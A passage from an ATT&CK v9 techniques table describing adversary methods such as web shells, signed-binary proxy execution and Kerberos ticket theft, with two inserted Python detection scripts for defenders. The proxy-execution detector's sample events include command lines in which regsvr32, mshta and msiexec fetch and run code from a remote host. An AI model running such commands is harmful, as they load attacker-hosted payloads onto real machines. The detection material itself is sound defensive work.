</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1593/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1593/001"> Social Media </a> </td> <td> Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1593/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1593/002"> Search Engines </a> </td> <td> Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typically crawl online sites to index content and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes). </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1594"> T1594 </a> </td> <td> <a href="/versions/v9/techniques/T1594"> Search Victim-Owned Websites </a> </td> <td> Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: <a href="/versions/v9/techniques/T1589/002">Email Addresses</a>). These sites may also have details highlighting business operations and relationships. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1505"> T1505 </a> </td> <td> <a href="/versions/v9/techniques/T1505"> Server Software Component </a> </td> <td> Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. 
Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1505/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1505/001"> SQL Stored Procedures </a> </td> <td> Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1505/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1505/002"> Transport Agent </a> </td> <td> Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails. Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1505/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1505/003"> Web Shell </a> </td> <td> Adversaries may backdoor web servers with web shells to establish persistent access to systems. 
A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1489"> T1489 </a> </td> <td> <a href="/versions/v9/techniques/T1489"> Service Stop </a> </td> <td> Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1129"> T1129 </a> </td> <td> <a href="/versions/v9/techniques/T1129"> Shared Modules </a> </td> <td> Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows <a href="/versions/v9/techniques/T1106">Native API</a> which is called from functions like <code>CreateProcess</code>, <code>LoadLibrary</code>, etc. of the Win32 API. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1218"> T1218 </a> </td> <td> <a href="/versions/v9/techniques/T1218"> Signed Binary Proxy Execution </a> </td> <td> Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. 
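As an added illustration for this entry and its Rundll32, Regsvr32, Mshta and Msiexec sub-techniques (example code written for this page, not part of the ATT&CK text), the following Python script runs a few proxy-execution rules over process-creation telemetry: rundll32 loading a DLL from outside the system directories or being spawned by an Office application, regsvr32 pointed at scrobj.dll or a URL, mshta given a URL or an inline javascript:/vbscript: payload, and msiexec installing a package from a URL. The events are constructed samples in a Sysmon-like shape (Image, CommandLine, ParentImage); the rules and the T1218.xxx labels they emit are the example's own mapping, not an official detection.

```python
"""Flag signed-binary proxy execution in process-creation events (added example, not ATT&CK code).
The events below are constructed samples; field names follow the Sysmon EID 1 convention."""
import re
from pathlib import PureWindowsPath

SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\upd.dll,Start",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http://203.0.113.9/x.sct scrobj.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe http://203.0.113.9/p.hta",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Windows\Installer\12345.msi /qn",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /q /i http://203.0.113.9/a.msi",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

URL = re.compile(r"https?://", re.IGNORECASE)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")

def _lower_name(path: str) -> str:
    """Base name of a Windows path, lower-cased; PureWindowsPath keeps this portable."""
    return PureWindowsPath(path).name.lower()

def loaded_module(cmdline: str) -> str:
    """For rundll32, return the DLL argument (first token after the image, up to the ',')."""
    tokens = cmdline.split(None, 1)
    if len(tokens) < 2:
        return ""
    return tokens[1].split(",", 1)[0].strip('"')

def classify(event: dict) -> list:
    """Return sub-technique hints for one event; [] when nothing matches."""
    image = _lower_name(event["Image"])
    cmd = event["CommandLine"]
    parent = _lower_name(event["ParentImage"])
    hits = []
    if image == "rundll32.exe":
        dll = loaded_module(cmd).lower()
        if dll and not dll.startswith(SYSTEM_DIRS):
            hits.append("T1218.011 rundll32 loading a DLL outside the system directories")
        if parent in OFFICE_PARENTS:
            hits.append("T1218.011 rundll32 spawned by an Office application")
    elif image == "regsvr32.exe":
        if "scrobj.dll" in cmd.lower() or URL.search(cmd):
            hits.append("T1218.010 regsvr32 loading a scriptlet or remote COM object")
    elif image == "mshta.exe":
        if URL.search(cmd) or re.search(r"(javascript|vbscript):", cmd, re.IGNORECASE):
            hits.append("T1218.005 mshta executing remote or inline script")
    elif image == "msiexec.exe":
        if URL.search(cmd):
            hits.append("T1218.007 msiexec installing a package from a URL")
    return hits

def detect(events: list) -> list:
    """(CommandLine, hits) for every event that trips at least one rule."""
    return [(e["CommandLine"], h) for e in events if (h := classify(e))]

if __name__ == "__main__":
    for cmdline, hits in detect(SAMPLE_EVENTS):
        print(cmdline, "->", "; ".join(hits))
```

The two benign events (a stock Control Panel rundll32 invocation from Explorer and a service-driven local MSI install) produce no hits; the point of keying on the DLL path, the parent process and the presence of a URL is that the binaries themselves are expected on every host, so an allowlist on the image alone tells you nothing.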
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1218/001"> Compiled HTML File </a> </td> <td> Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such as VBA, JScript, Java, and ActiveX. CHM content is displayed using underlying components of the Internet Explorer browser loaded by the HTML Help executable program (hh.exe). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1218/002"> Control Panel </a> </td> <td> Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1218/003"> CMSTP </a> </td> <td> Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1218/004"> InstallUtil </a> </td> <td> Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. 
InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1218/005"> Mshta </a> </td> <td> Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1218/007"> Msiexec </a> </td> <td> Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi). Msiexec.exe is digitally signed by Microsoft. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/008"> .008 </a> </td> <td> <a href="/versions/v9/techniques/T1218/008"> Odbcconf </a> </td> <td> Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names. Odbcconf.exe is digitally signed by Microsoft. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/009"> .009 </a> </td> <td> <a href="/versions/v9/techniques/T1218/009"> Regsvcs/Regasm </a> </td> <td> Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET <a href="/versions/v9/techniques/T1559/001">Component Object Model</a> (COM) assemblies. Both are digitally signed by Microsoft. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/010"> .010 </a> </td> <td> <a href="/versions/v9/techniques/T1218/010"> Regsvr32 </a> </td> <td> Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/011"> .011 </a> </td> <td> <a href="/versions/v9/techniques/T1218/011"> Rundll32 </a> </td> <td> Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, instead of loading a DLL directly (i.e. <a href="/versions/v9/techniques/T1129">Shared Modules</a>), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1218/012"> .012 </a> </td> <td> <a href="/versions/v9/techniques/T1218/012"> Verclsid </a> </td> <td> Adversaries may abuse verclsid.exe to proxy execution of malicious code. 
Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1216"> T1216 </a> </td> <td> <a href="/versions/v9/techniques/T1216"> Signed Script Proxy Execution </a> </td> <td> Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1216/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1216/001"> PubPrn </a> </td> <td> Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1072"> T1072 </a> </td> <td> <a href="/versions/v9/techniques/T1072"> Software Deployment Tools </a> </td> <td> Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.). 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1518"> T1518 </a> </td> <td> <a href="/versions/v9/techniques/T1518"> Software Discovery </a> </td> <td> Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from <a href="/versions/v9/techniques/T1518">Software Discovery</a> during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1518/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1518/001"> Security Software Discovery </a> </td> <td> Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from <a href="/versions/v9/techniques/T1518/001">Security Software Discovery</a> during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1608"> T1608 </a> </td> <td> <a href="/versions/v9/techniques/T1608"> Stage Capabilities </a> </td> <td> Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed (<a href="/versions/v9/techniques/T1587">Develop Capabilities</a>) or obtained (<a href="/versions/v9/techniques/T1588">Obtain Capabilities</a>) and stage them on infrastructure under their control. 
These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary (<a href="/versions/v9/techniques/T1583">Acquire Infrastructure</a>) or was otherwise compromised by them (<a href="/versions/v9/techniques/T1584">Compromise Infrastructure</a>). Capabilities can also be staged on web services, such as GitHub or Pastebin. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1608/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1608/001"> Upload Malware </a> </td> <td> Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable <a href="/versions/v9/techniques/T1105">Ingress Tool Transfer</a> by placing it on an Internet accessible web server. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1608/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1608/002"> Upload Tool </a> </td> <td> Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: <a href="/versions/v9/software/S0029">PsExec</a>). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable <a href="/versions/v9/techniques/T1105">Ingress Tool Transfer</a> by placing it on an Internet accessible web server. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1608/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1608/003"> Install Digital Certificate </a> </td> <td> Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1608/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1608/004"> Drive-by Target </a> </td> <td> Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in <a href="/versions/v9/techniques/T1189">Drive-by Compromise</a>. In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as <a href="/versions/v9/techniques/T1550/001">Application Access Token</a>. Prior to <a href="/versions/v9/techniques/T1189">Drive-by Compromise</a>, adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. 
Drive-by content can be staged on adversary controlled infrastructure that has been acquired (<a href="/versions/v9/techniques/T1583">Acquire Infrastructure</a>) or previously compromised (<a href="/versions/v9/techniques/T1584">Compromise Infrastructure</a>). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1608/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1608/005"> Link Target </a> </td> <td> Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in <a href="/versions/v9/techniques/T1204/001">Malicious Link</a>. Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in <a href="/versions/v9/techniques/T1598/003">Spearphishing Link</a>) or a phish to gain initial access to a system (as in <a href="/versions/v9/techniques/T1566/002">Spearphishing Link</a>), an adversary must set up the resources for a link target for the spearphishing link. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1528"> T1528 </a> </td> <td> <a href="/versions/v9/techniques/T1528"> Steal Application Access Token </a> </td> <td> Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1558"> T1558 </a> </td> <td> <a href="/versions/v9/techniques/T1558"> Steal or Forge Kerberos Tickets </a> </td> <td> Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable <a href="/versions/v9/techniques/T1550/003">Pass the Ticket</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1558/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1558/001"> Golden Ticket </a> </td> <td> Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket. Golden tickets enable adversaries to generate authentication material for any account in Active Directory. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1558/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1558/002"> Silver Ticket </a> </td> <td> Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1558/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1558/003"> Kerberoasting </a> </td> <td> Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to <a href="/versions/v9/techniques/T1110">Brute Force</a>. 
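As an added illustration for this entry and for the AS-REP Roasting row that follows it (example code written for this page, not part of the ATT&CK text), the following Python script runs two detections over Windows Security events: Kerberoasting shows up as one principal requesting RC4-encrypted (etype 0x17) service tickets for several distinct service accounts in a short window (event ID 4769), and AS-REP roasting as TGT requests for accounts logged with pre-authentication type 0, i.e. accounts that have preauthentication disabled (event ID 4768). The events are constructed samples using the field names from those two event schemas; the window and threshold values are assumptions to tune per environment.

```python
"""Hunt Kerberoasting (4769) and AS-REP roasting (4768) in Security events (added example, not ATT&CK code).
The events below are constructed samples; field names follow the Windows event schemas."""
from collections import defaultdict

RC4_HMAC = "0x17"          # TicketEncryptionType for RC4-HMAC; AES is 0x11/0x12
NO_PREAUTH = "0"           # 4768 PreAuthType 0 = "Logon without Pre-Authentication"

# Constructed samples. Time is seconds since an arbitrary epoch, used only for windowing.
SAMPLE_EVENTS = [
    {"EventID": 4769, "Time": 100, "TargetUserName": "alice@CORP.LOCAL", "IpAddress": "10.0.0.5",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4769, "Time": 101, "TargetUserName": "alice@CORP.LOCAL", "IpAddress": "10.0.0.5",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "Time": 102, "TargetUserName": "alice@CORP.LOCAL", "IpAddress": "10.0.0.5",
     "ServiceName": "svc_sharepoint", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "Time": 103, "TargetUserName": "alice@CORP.LOCAL", "IpAddress": "10.0.0.5",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "Time": 900, "TargetUserName": "bob@CORP.LOCAL", "IpAddress": "10.0.0.9",
     "ServiceName": "FS01$", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4768, "Time": 950, "TargetUserName": "svc_legacy", "IpAddress": "10.0.0.5",
     "PreAuthType": NO_PREAUTH, "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4768, "Time": 951, "TargetUserName": "bob", "IpAddress": "10.0.0.9",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
]

def is_roastable_tgs(event: dict) -> bool:
    """A successful RC4 service ticket for a non-krbtgt, non-computer service account."""
    svc = event.get("ServiceName", "")
    return (event["EventID"] == 4769
            and event["Status"] == "0x0"
            and event["TicketEncryptionType"] == RC4_HMAC
            and svc.lower() != "krbtgt"
            and not svc.endswith("$"))

def kerberoasting_alerts(events: list, window: int = 60, threshold: int = 3) -> list:
    """Alert when one requester (user, source IP) obtains >= threshold distinct roastable
    service tickets within `window` seconds; one alert per requester."""
    by_requester = defaultdict(list)
    for e in events:
        if is_roastable_tgs(e):
            by_requester[(e["TargetUserName"], e["IpAddress"])].append(e)
    alerts = []
    for (user, ip), reqs in by_requester.items():
        reqs.sort(key=lambda e: e["Time"])
        for i, start in enumerate(reqs):          # slide the window over the sorted requests
            in_window = [r for r in reqs[i:] if r["Time"] - start["Time"] <= window]
            services = sorted({r["ServiceName"] for r in in_window})
            if len(services) >= threshold:
                alerts.append({"user": user, "ip": ip, "services": services})
                break
    return alerts

def asrep_roasting_alerts(events: list) -> list:
    """4768 TGT requests for accounts with preauthentication disabled; the etype is reported
    because an RC4 AS-REP is the cheapest to crack offline."""
    return [{"account": e["TargetUserName"], "ip": e["IpAddress"],
             "etype": e["TicketEncryptionType"]}
            for e in events
            if e["EventID"] == 4768 and e.get("PreAuthType") == NO_PREAUTH and e["Status"] == "0x0"]

if __name__ == "__main__":
    print(kerberoasting_alerts(SAMPLE_EVENTS))
    print(asrep_roasting_alerts(SAMPLE_EVENTS))
```

Filtering out krbtgt and computer accounts (names ending in $) keeps normal ticket traffic out of the count; the remaining RC4 requests are exactly the tickets an adversary wants, because a service account's password, not a machine's random one, is what the offline brute force recovers. In an environment that still logs RC4 for legitimate legacy services, raise the threshold or key the rule on the requester's baseline instead.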
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1558/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1558/004"> AS-REP Roasting </a> </td> <td> Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by <a href="/versions/v9/techniques/T1110/002">Password Cracking</a> Kerberos messages. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1539"> T1539 </a> </td> <td> <a href="/versions/v9/techniques/T1539"> Steal Web Session Cookie </a> </td> <td> An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1553"> T1553 </a> </td> <td> <a href="/versions/v9/techniques/T1553"> Subvert Trust Controls </a> </td> <td> Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1553/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1553/001"> Gatekeeper Bypass </a> </td> <td> Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls. 
In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called <code>com.apple.quarantine</code>. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1553/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1553/002"> Code Signing </a> </td> <td> Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. The certificates used during an operation may be created, acquired, or stolen by the adversary. Unlike <a href="/versions/v9/techniques/T1036/001">Invalid Code Signature</a>, this activity will result in a valid signature. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1553/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1553/003"> SIP and Trust Provider Hijacking </a> </td> <td> Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1553/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1553/004"> Install Root Certificate </a> </td> <td> Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary-controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted, an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1553/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1553/005"> Mark-of-the-Web Bypass </a> </td> <td> Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named <code>Zone.Identifier</code> with a specific value known as the MOTW. Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if an MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen, which compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1553/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1553/006"> Code Signing Policy Modification </a> </td> <td> Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1195"> T1195 </a> </td> <td> <a href="/versions/v9/techniques/T1195"> Supply Chain Compromise </a> </td> <td> Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1195/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1195/001"> Compromise Software Dependencies and Development Tools </a> </td> <td> Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency. </td> </tr> <tr class="sub technique"> <td></td> <td> <a 